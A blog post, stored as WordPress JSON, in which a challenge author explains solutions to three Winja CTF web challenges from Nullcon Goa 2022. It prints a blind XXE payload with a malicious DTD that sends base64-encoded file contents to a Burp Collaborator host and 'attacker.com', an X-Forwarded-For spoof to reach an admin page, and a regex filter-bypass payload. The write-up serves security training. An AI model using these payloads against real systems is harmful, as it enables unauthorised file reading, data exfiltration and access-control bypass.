{"id":966,"date":"2022-09-12T16:00:33","date_gmt":"2022-09-12T16:00:33","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=966"},"modified":"2022-09-14T19:24:24","modified_gmt":"2022-09-14T19:24:24","slug":"winja-ctf-web-challenges-solutions-nullcon-goa-2022","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/winja-ctf-web-challenges-solutions-nullcon-goa-2022\/","title":{"rendered":"Winja CTF &#8211; Web Challenges Solutions &#8211; Nullcon Goa 2022"},"content":{"rendered":"\n<p>Hey Fellas. It was a blast this year at Nullcon. And I had a great time exploring and creating web challenges. If you haven&#8217;t checked out the solutions to OSINT challenges, you can find it <a href=\"https:\/\/shreyapohekar.com\/blogs\/winja-ctf-nullcon-goa-2022-osint-challenges-writeup\/\" target=\"_blank\" rel=\"noreferrer noopener\">here<\/a>.<\/p>\n\n\n\n<p>Let&#8217;s walk through all the web challenges I created.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Webb Space<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Challenge description<\/h3>\n\n\n\n<p>We wonder. It\u2019s our nature. How did we get here?<br>Are we alone in the universe?<br>How does the universe work?<br>\u200b<br>The James Webb Space Telescope is an ambitious scientific endeavour to answer these questions. Webb builds on the legacy of previous space-based telescopes to push the boundaries of human knowledge even further, to the formation of the first galaxies and the horizons of other worlds.<br>\u200b<br>To answer all your queries, we have created a contact form and an expert from NASA will be answering to each one of them. So, shoot your questions.<br>\u200b<br>https:\/\/webbspace.chall.winja.site<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Solution<\/h3>\n\n\n\n<p>The links directs us to a contact form where hitting submit does NOTHING!!<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"444\" height=\"573\" src=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-4.png\" alt=\"\" class=\"wp-image-974\" srcset=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-4.png 444w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-4-232x300.png 232w\" sizes=\"(max-width: 444px) 100vw, 444px\" \/><\/figure>\n\n\n\n<p>However, If you capture this request on burp, It say that you request has been submitted and You will hear from us soon!<\/p>\n\n\n\n<p>For this challenge, the important part is the <code>XML Format<\/code> of the data, that totally directs to XXE attacks.<\/p>\n\n\n\n<p>But here&#8217;s a catch! It&#8217;s not a basic XXE. So the basic XXE payload wont work here as no result\/errors are displayed. This challenge is based on Blind XEE, where data has to be retrieved over External Server. Read More about Blind XXE [<a href=\"https:\/\/shreyapohekar.com\/blogs\/blind-xxe-attacks-out-of-band-interaction-techniques-oast-to-exfilterate-data\/\" target=\"_blank\" rel=\"noreferrer noopener\">here<\/a>]<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Steps<\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>Host a malicious DTD containing the URL of the burp collaborator client. An alternative can be <code>ngrok<\/code>. You can host this DTD on your server or simply on pastebin.com<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&lt;!ENTITY % all \"&lt;!ENTITY &amp;#x25; req SYSTEM 'https:\/\/lujs5f02qzedctukwbjkyems4ja9yy.burpcollaborator.net\/%file;'&gt;\"&gt;<\/pre>\n\n\n\n<ul class=\"wp-block-list\"><li>Now make the following request and hit send. The response will still look the same. However, you will receive outbound connection on your burp collaborator client.<\/li><li>If you are wondering why <code>shaun<\/code> is used, There is a hint given in https:\/\/webbspace.chall.winja.site\/humans.txt that discloses an email ie <code>shaun@winja.net<\/code>   \/\/\/\/  Alternatively you can first grep the contents of \/etc\/passwd which will leak the user name <code>shaun<\/code><\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&lt;!DOCTYPE foo [\n&lt;!ENTITY % file SYSTEM \"php:\/\/filter\/convert.base64-encode\/resource=\/home\/shaun\/flag.txt\"&gt;\n&lt;!ENTITY % dtd SYSTEM \"http:\/\/attacker.com\/xxe.dtd\"&gt;\n&lt;!-- load dtd file --&gt;\n%dtd;\n&lt;!-- Resolve the nested external entity --&gt;\n%all;\n&lt;!-- resolve the external entity req along with file reference --&gt;\n%req;\n]&gt;<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"345\" src=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-payload-1024x345.png\" alt=\"\" class=\"wp-image-969\" srcset=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-payload-1024x345.png 1024w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-payload-300x101.png 300w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-payload-768x259.png 768w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-payload-640x216.png 640w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-payload.png 1346w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\"><li>Search for the HTTP Type in requests and the request will have a base64 string. Decode it to get the flag.<\/li><\/ul>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-collaborator-client.png\" alt=\"\" class=\"wp-image-968\" width=\"840\" height=\"404\" srcset=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-collaborator-client.png 882w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-collaborator-client-300x145.png 300w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-collaborator-client-768x370.png 768w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-collaborator-client-640x308.png 640w\" sizes=\"(max-width: 840px) 100vw, 840px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Project Artemis<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Challenge description<\/h3>\n\n\n\n<p>NASA&#8217;s ambitious &#8216;Moon to Mars&#8217; plan involves building a new space station in lunar orbit and, eventually, a habitable Moon base. But not all the details around the project are disclosed. Can you access the secret information?<\/p>\n\n\n\n<p><a href=\"https:\/\/project-artemis.chall.winja.site\/\">https:\/\/project-artemis.chall.winja.site\/<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Solution<\/h3>\n\n\n\n<p>Once you visit the challenge link, you will see at the bottom that it is created by NASA Admin. This hints to the page <code>admin.php<\/code> that shows the message &#8220;You are not allowed to access this file.&#8221;<\/p>\n\n\n\n<p>Capture this request on burp and Start Param-Miner [Right Click -&gt; Guess headers]. Param Miner will identify that X-Forwarded-For is enabled for this host.<\/p>\n\n\n\n<p>Make the following request to get the flag&#8230;<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">GET \/admin.php HTTP\/1.1\nHost: project-artemis.chall.winja.site\nX-Forwarded-For: 127.0.0.2\nConnection: close\nCache-Control: max-age=0\nsec-ch-ua: \"Chromium\";v=\"104\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"104\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Language: en-US,en;q=0.9\n<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"324\" src=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-1024x324.png\" alt=\"\" class=\"wp-image-967\" srcset=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-1024x324.png 1024w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-300x95.png 300w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-768x243.png 768w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-640x203.png 640w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image.png 1311w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Something to note here is that only 127.0.0.2 is enabled as this too determines the home address.<\/p>\n\n\n\n<p> I didn&#8217;t expect it would have such fewer solves. Kudos to the ones who were able to get through!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Key to Mars<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Challenge Description<\/h3>\n\n\n\n<p>The curiosity rover spacecraft launcher is protected by a key to avoid any unauthorised launch. Even though the key is complex, it is still possible to crack it. Can you activate the launcher?<\/p>\n\n\n\n<p><a href=\"https:\/\/keytomars.chall.winja.site\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/keytomars.chall.winja.site<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"750\" height=\"385\" src=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-3.png\" alt=\"\" class=\"wp-image-972\" srcset=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-3.png 750w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-3-300x154.png 300w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-3-640x329.png 640w\" sizes=\"(max-width: 750px) 100vw, 750px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Solution<\/h3>\n\n\n\n<p>The key is complex but still can be cracked is a hint that directs to **regex**!!!<\/p>\n\n\n\n<p>There was another hint that is given in <code>hint.txt<\/code> ! Great work if you found it \ud83d\ude42<\/p>\n\n\n\n<p>Moving forward to the solution.<\/p>\n\n\n\n<p>As you now know, the challenge is all about regex, let&#8217;s dive in..<\/p>\n\n\n\n<p>Typing any random charater in the input field would give you a delay of 3 secs and later echoing **Incorrect**. However, If you type a string like <code>flag<\/code> , It will say would found that simply determines that the you found the substring of the key!<\/p>\n\n\n\n<p>The interesting part here is that characters like <code>. + *<\/code> are blocked. So you wont be able to get the flag via a simple regex payload.<\/p>\n\n\n\n<p>**Possible Payload** : [\\s \\W \\w \\S]{0,}<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"687\" height=\"84\" src=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-1.png\" alt=\"\" class=\"wp-image-970\" srcset=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-1.png 687w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-1-300x37.png 300w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-1-640x78.png 640w\" sizes=\"(max-width: 687px) 100vw, 687px\" \/><\/figure>\n\n\n\n<p>Let me know in the comments, which payload did you used to get the flag!!<\/p>\n\n\n\n<p>Thank you for participating in WinjaCTF. I hope you enjoyed solving it. We are always open to adding more people in the team who are really interested and willing to contribute to the Winja CTF challenge. Feel free to reach out if you are interested and want to learn and grow with us. <a href=\"https:\/\/t.co\/YPWAn3dykf\">Winja CTF discord<\/a> would be the best place to reach out.<\/p>\n\n\n\n<p>That&#8217;s all for this blog post!<\/p>\n\n\n\n<p>I hope you enjoyed solving Winja CTF!<\/p>\n\n\n\n<p>See you in the next one. Until then, happy hunting! \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This post contains the web challenges created by me in winja ctf 2022.<\/p>\n","protected":false},"author":1,"featured_media":992,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[280,2],"tags":[296,370,369,285,281],"class_list":["post-966","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","category-information-security","tag-ctf","tag-ctf-2022","tag-goa","tag-web","tag-winja","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/966"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=966"}],"version-history":[{"count":11,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/966\/revisions"}],"predecessor-version":[{"id":999,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/966\/revisions\/999"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/992"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=966"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=966"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=966"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}